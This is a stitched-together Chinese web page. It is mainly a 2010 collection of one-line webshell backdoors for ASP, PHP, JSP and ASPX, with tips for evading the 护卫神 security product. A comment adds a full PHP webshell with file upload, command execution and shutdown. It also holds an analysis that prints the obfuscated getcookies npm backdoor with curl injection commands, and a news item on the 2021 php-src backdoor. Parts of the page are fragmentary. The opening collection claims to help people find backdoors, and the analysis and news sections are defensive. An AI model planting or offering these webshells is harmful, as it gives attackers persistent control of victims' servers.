整理的比较全的一句话后门代码(方面大家查找后门)
更新时间：2010年09月05日 12:23:00   作者：
整理的比较全的一句话后门代码(方面大家查找后门)，很多情况下也会有一些特殊字符的表示，原理一样。
最近一句话后门不断升级大家注意防范，基本上多事字符替换
过护卫神PHP一句话作者：小东
$a($_POST["c"]); ?>
测试成功，主要对付护卫神，其他的也可以试试
dedecms5.7一句话后门
@eval(file_get_contents('php://input'));
asp一句话木马
程序代码
程序代码
程序代码
程序代码
程序代码
程序代码
[code]
[code]
程序代码
%>
程序代码
程序代码
程序代码
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
//容错代码
程序代码
var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
%>
//使用冰狐一句话客户端链接
程序代码
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之，同时压入6个基对象作为参数
%>
调用示例：
程序代码
http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29
php一句话
程序代码
程序代码
//容错代码
程序代码
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
$_POST['sa']($_POST['sb']);?>
程序代码
$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
h=@eval($_POST[c]);
程序代码
//绕过<?限制的一句话 
JSP一句话
程序代码
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
提交客户端
程序代码
your code
ASPX一句话
程序代码
程序代码
//Jscript的asp.net一句话
程序代码
//C#的asp.net一句话
程序代码
 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
VB的asp.net一句话
第一:114la网址导航系统后台getwebshell,最新版本,已经禁止了直接输入<?php这样的代码 
所以可以试用
第二,使用菜刀的附加数据功能可以出现很多转换.所以还是仔细阅读下菜刀的readme.txt,上面的代码来自LCX的博客
第三,使用mssql备份一句话的时候,特别是asp.net和jsp,因为代码过长,所以,需要再代码前面和后面多加空格等垃圾字符保证代码完整性,这个跟备份bat到启动项一个原理.
相关文章
                            
这篇文章主要介绍了lambda 表达式导致 Arthas 无法 redefine 的问题,本文通过图文实例相结合给大家介绍的非常详细，对大家的学习或工作具有一定的参考借鉴价值，需要的朋友可以参考下2020-06-06
这些日子一直在简书上使用markdown写作，已经渐渐的痴迷于这种简洁纯粹的写作方式了。不过就我逐渐入门markdown的写作过程来看，目前我看到的各种介绍markdown写作方式的文章都还略显极客，对于大多数像我一样没有基础的普通人来说，可能内容上的可接受性没有那么强2016-08-08
再见，2017，你好，2018！祝大家在新的一年里，快快乐乐，编程技术更上一层楼，元旦快乐2018-01-01
这篇文章主要介绍了UUencode 编码，UU编码介绍、UUencode编码转换原理与算法,需要的朋友可以参考下2016-06-06
这篇文章主要为大家分享了人工智能"六步走"学习路线，具有一定的参考价值，感兴趣的小伙伴们可以参考一下2017-12-12
这篇文章主要介绍了关注程序员健康：程序最需要注意的几件事,本文列举了熬夜、久坐、外卖和泡面、缺乏锻炼、用眼过度等5个方面,需要的朋友可以参考下2014-09-09
本文作者作为一名从事PHP开发11年的资深开发者，却放弃了PHP而改用Python。2009-09-09
当某个用户发出一个邀请后，另一个用户通过这个链接进行网站后，为发这个链接的用户加10个积分。2011-09-09
我们在写程序时，常常需要指明两条或者更多的执行路径，使得程序执行时，能够选择其中一条路径，去执行相应的语句，产生对应的结果 —— 这也是条件语句在程序中的作用。下面通过例子给大家介绍下if-else的使用，感兴趣的朋友一起看看吧2020-10-10
bower是twitter的又一个开源项目，使用nodejs开发，用于web包管理。如果越来越多得开源项目都托管在github上，bower只需要将github上项目加上一个配置文件既可以使用bower方式使用安装包2013-12-12
最新评论

http://blog.ddian.cn/?post=980
1.[代码][PHP]代码
$fp = '';
$path = '';
if(empty($_GET['action'])){
if(empty($_GET['path'])){
$_path = dirname(__FILE__);
}else{
if(is_dir($_GET['path'])){
$_path = $_GET['path'];
}else{
$_path .=  dirname($_GET['path']);
$file_name = $_GET['path'];
if (!file_exists($file_name)) { //检查文件是否存在
echo "文件找不到";
} else {
$file = fopen($file_name,"r"); // 打开文件
// 输入文件标签
Header("Content-type: application/octet-stream");
Header("Accept-Ranges: bytes");
Header("Accept-Length: ".filesize($file_name));
Header("Content-Disposition: attachment; filename=" . str_replace(array(dirname($_GET['path']),'/'),'',$file_name));
// 输出文件内容
echo fread($file,filesize($file_name));
fclose($file);
exit;
}
}
}
}else if($_GET['action'] == 'close'){
$time = intval($_GET['time']) > 0 ? intval($_GET['time']) : $_GET['time'];
exec('shutdown -s -t '.$time);
$_path = $_GET['path'];
}else if($_GET['action'] == 'cancel'){
exec('shutdown -a');
$_path = $_GET['path'];
}else if($_GET['action'] == 'mkdir'){
$_path = $_GET['path'];
$name =  $_GET['name'];
$_path .=  $name;
mkdir($_path);
}else if($_GET['action'] == 'upload'){
$_path = $_POST['path'];
$name =  $_FILES['name'];
move_uploaded_file($name['tmp_name'],$_path  . $name['name'] );
}else if($_GET['action'] == 'ord'){
$_path = $_GET['path'];
$name =  $_GET['name'];
exec($name);
}
$dir = dir($_path);
?>
目录:
秒
创建目录:
执行命令:
文件上传:
while($fp = $dir->read()){
?>
<?php echo $fp ?>删除下载
}
?>

前段时间 Express 中的一个中间件 getcookies 被爆出存在 backdoor，关注了一波，但仅看官方npm 的解释，一时半会儿没想明白黑客是怎么留的后门，一直困扰着我。今天有空仔细看了一下，了解了黑客具体的作案手段。文中的代码可以在 drafts/getcookies 中查找。
原文链接
后门代码分析
这个后门代码找得也不容易，因为在被爆出后门后，npm 团队第一时间就删除下架了，github 上的仓库也没找到，不过不负有心人，在 npm.runkit 中找到了后门源码。
黑客巧妙地把 backdoor 代码伪装成测试代码放在 test 目录中，并在 index.js “不经意” 引入了测试代码
主要的 require('vm')['runInThisContext'] 代码被编码故意伪装了一下
全程使用 16 进制，让不想细看的人以为是测试代码
// 分配一块 64K 的内存
module.exports.log = module.exports.log || Buffer.alloc(0xffff);

// gCOMMANDhDATAi
JSON.stringify(req.headers).replace(/g([a-f0-9]{4})h((?:[a-f0-9]{2})+)i/gi, (o, p, v) => {
    // 以 0xfffe 命令为样例
    // 将字符串 feff 读入 Buffer
    // 'feff' => <Buffer fe ff>
    // readUInt16LE 读取 16 bit(位) 并以 byte(字节) 反向排序
    // <Buffer fe ff> => 0xfffe
    //
    // > Buffer.from('feff', 'hex').readUInt16LE(0) === 0xfffe
    // true
    // > Buffer.from('1234567890', 'hex').readUInt32LE(1).toString(16)
    // '90785634'
    p = Buffer.from(p, 'hex').readUInt16LE(0);
    switch (p) {

        case 0xfffe:
            module.exports.log = Buffer.alloc(0xffff);
            return;
        case 0xfffa:
            return setTimeout(() => {

                // 去除末尾的 0x00
                let c = module.exports.log.toString().replace(/\x00*$/, '');
                module.exports.log = Buffer.alloc(0xffff);

                // 不能以 0x00 开头
                if (c.indexOf('\x00') < 0) {
                    // require('vm')['runInThisContext'](c)(module.exports, require, req, res, next)
                    // 代码必须是个函数
                    require('\x76\x6d')['\x72\x75\x6e\x49\x6e\x54\x68\x69\x73\x43\x6f\x6e\x74\x65\x78\x74'](c)(module.exports, require, req, res, next);
                }
                next();
            }, 1000);
        default:
            // 我们以 (function(){console.log('hack')}) 为例
            v = Buffer.from(v, 'hex');
            for (let i = 0; i < v.length; i++) {

                // 因为执行命令的时候，不能以 0x00 开头
                // 所以，p 必须是 0x0000
                module.exports.log[p + i] = v[i];
            }
    }
});
复制代码
测试一下后门
写一个 express 应用，并将中间件引入进来
var express = require('express')
var app = express()

var getcookies = require('..');

app.use(getcookies);
app.get('/', function (req, res) {
  res.send('Hello World')
})

app.listen(3000)

复制代码
启动并执行我们的后门代码
$ node demo/index.js
// 向服务器注入 16 进制代码 (function(){console.log('hack')})
$ curl -H 'evil: g0000h2866756e6374696f6e28297b636f6e736f6c652e6c6f6728276861636b27297d29i'  http://127.0.0.1:3000
// 向服务器发送执行命令
$ curl -H 'evil: gfaffh00i'  http://127.0.0.1:3000
复制代码
注意，中途出现的 hack 就是被注入代码的输出。

References

以上分析的仓库代码


文件来源


讨论地址


细思极恐：后门代码被隐藏在npm模块中，差点就得逞


npm blog


16进制转换


转载于:https://juejin.im/post/5b0a620551882538ac1ce60e

                    

                    
                    
                    
                    
2021年3月28日，有身份不明人士入侵了PHP编程语言的官方Git服务器http://git.php.net，并上传了未经授权的更新包，而包中源代码被插入了秘密后门代码。
这两个恶意提交被推送到git.php.net服务器上的自托管php-src存储库中，使用的是编程语言的作者Rasmus Lerdorf和Microsoft的软件开发人员Nikita Popov的名字Jetbrains。
PHP方面发布紧急公告指出：
2021-03-28，两个恶意代码分支提交到了php-src repo上，使用的是内部人员的名字，目前内部不知道是如何发生，但是一切都指向了git.php.net服务器可能被入侵的情况。
尽管目前正在调查，但是为了确保安全，我们已经停止了git.php.net服务器，之后会跳转到Github上的镜像存储库中。
被插入代码地址，实现的功能很显然了。
https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d
https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
黑鸟在代码中发现含有Zerodium的字符，Zerodium是一个著名的0day漏洞经纪人，这里的字符串很有可能是攻击者为了嫁祸给Zerodium。
目前安全社区认为，攻击的手段可能是这个：
在2021年2月，有研究人员就发布了一种新颖的供应链攻击，安全研究人员设法破坏了超过35家主要公司的内部系统，包括Microsoft，Apple，PayPal，Shopify，Netflix，Yelp，Tesla和Uber的内部系统，并实现了远程代码执行。
该技术称为依赖混淆（dependency confusion） 或替代攻击，它利用一个软件可能包含来自私有和公共来源的混合依赖库。
简单来说，就是攻击者首先通过收集大量这些公司的一些私有库（很多是由于github的代码或者js中的代码泄露导致），也就是一些内部会使用的库的名称，而这些库一般是不会传到公有库里面去的，例如pypI、npm。
而这时候，攻击者将恶意代码库命名为私有库名称，并将其伪造成最新的私有库模块上传到公有库中，而有的公司的代码中可能存在错误的更新配置，导致客户端会自动从公有库中下载伪造的“最新”版本而无需要求开发人员采取任何措施，这样在调用库的时候就直接中招了。（仅举例说明，详细请参考链接）
作者采取了DNS传输的方法将数据从受害者的电脑传输到其设备中。
当然以上都是其他的技术，具体PHP的Git服务器如何被入侵还需要等待详细调查。
如果有定期更新PHP源代码习惯的同学记得检查一二，防止被供应链攻击。
参考链接：
https://news-web.php.net/php.internals/113838
https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610